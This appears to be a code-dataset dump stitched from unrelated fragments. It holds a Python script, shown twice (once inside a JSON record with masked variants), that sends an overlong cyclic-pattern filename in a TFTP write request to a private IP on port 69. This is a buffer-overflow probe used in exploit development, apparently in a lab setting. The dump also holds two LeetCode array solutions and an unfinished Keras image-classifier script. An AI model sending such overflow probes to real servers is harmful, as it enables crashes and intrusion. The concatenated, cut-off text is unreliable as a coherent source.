filename = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"
mode = "netascii"
buf = "\x00\x02" + filename+ "\0" + mode+ "\0"
s.sendto(buf, (host, port))
|
normal
|
{
"blob_id": "b318f5d443dbf8e4442707839649149e75653295",
"index": 5917,
"step-1": "#!/usr/bin/python \nimport socket \nimport sys\n\nhost = '10.211.55.5' \nport = 69\ntry:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nexcept:\n print \"socket() failed\" \n sys.exit(1)\nfilename = \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk\"\nmode = \"netascii\"\nbuf = \"\\x00\\x02\" + filename+ \"\\0\" + mode+ \"\\0\" \ns.sendto(buf, (host, port))",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
class Solution(object):
def findDisappearedNumbers(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
ns = [0]*len(nums)
for i in range(0, len(nums), 1):
ns[nums[i]-1] = 1
ret = []
for j in range(0, len(ns), 1):
if(ns[j] == 0): ret.append(j+1)
return ret
class Solution(object):
def findDisappearedNumbers(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
for i in range(0, len(nums), 1):
index = abs(nums[i]) - 1
nums[index] = - abs(nums[index])
return [i + 1 for i in range(0, len(nums), 1) if nums[i] > 0]
|
normal
|
{
"blob_id": "87504fb88cbbf810ad8bab08bc59284d2cf37cce",
"index": 850,
"step-1": "<mask token>\n\n\nclass Solution(object):\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution(object):\n\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n for i in range(0, len(nums), 1):\n index = abs(nums[i]) - 1\n nums[index] = -abs(nums[index])\n return [(i + 1) for i in range(0, len(nums), 1) if nums[i] > 0]\n",
"step-3": "class Solution(object):\n <mask token>\n\n\nclass Solution(object):\n\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n for i in range(0, len(nums), 1):\n index = abs(nums[i]) - 1\n nums[index] = -abs(nums[index])\n return [(i + 1) for i in range(0, len(nums), 1) if nums[i] > 0]\n",
"step-4": "class Solution(object):\n\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n ns = [0] * len(nums)\n for i in range(0, len(nums), 1):\n ns[nums[i] - 1] = 1\n ret = []\n for j in range(0, len(ns), 1):\n if ns[j] == 0:\n ret.append(j + 1)\n return ret\n\n\nclass Solution(object):\n\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n for i in range(0, len(nums), 1):\n index = abs(nums[i]) - 1\n nums[index] = -abs(nums[index])\n return [(i + 1) for i in range(0, len(nums), 1) if nums[i] > 0]\n",
"step-5": "class Solution(object):\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n ns = [0]*len(nums)\n for i in range(0, len(nums), 1):\n ns[nums[i]-1] = 1\n \n ret = []\n for j in range(0, len(ns), 1):\n if(ns[j] == 0): ret.append(j+1)\n return ret\n\nclass Solution(object):\n def findDisappearedNumbers(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n for i in range(0, len(nums), 1):\n index = abs(nums[i]) - 1\n nums[index] = - abs(nums[index])\n\n return [i + 1 for i in range(0, len(nums), 1) if nums[i] > 0]",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import cv2
import numpy as np
import matplotlib
matplotlib.use('agg')
import matplotlib.pyplot as plt
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import SeparableConv2D, Conv2D, MaxPooling2D
from keras.layers import BatchNormalization, Activation, Dropout, Flatten, Dense
from keras import backend as K
# dimensions of images.
img_width, img_height = 64,64
train_data_dir = 'data/train'
validation_data_dir = 'data/test'
nb_train_samples = 25473
nb_validation_samples = 7000
epochs = 50
batch_size = 64
if K.image_data_format() == 'channels_first':
input_shape = (3, img_width, img_height)
else:
input_shape = (img_width, img_height, 3)
model = Sequential()
convout1 = Conv2D(32, kernel_size=6, strides=2, input_shape=input_shape)
model.add(convout1)
activ1 = Activation('relu')
model.add(activ1)
convout2 = Conv2D(64, kernel_size=5, strides=1)
model.add(convout2)
activ2 = Activation('relu')
model.add(activ2)
pool1 = MaxPooling2D(pool_size=(3, 3), strides=1)
model.add(pool1)
convout3 = Conv2D(128, kernel_size=4, strides=2)
model.add(convout3)
activ3 = Activation('relu')
model.add(activ3)
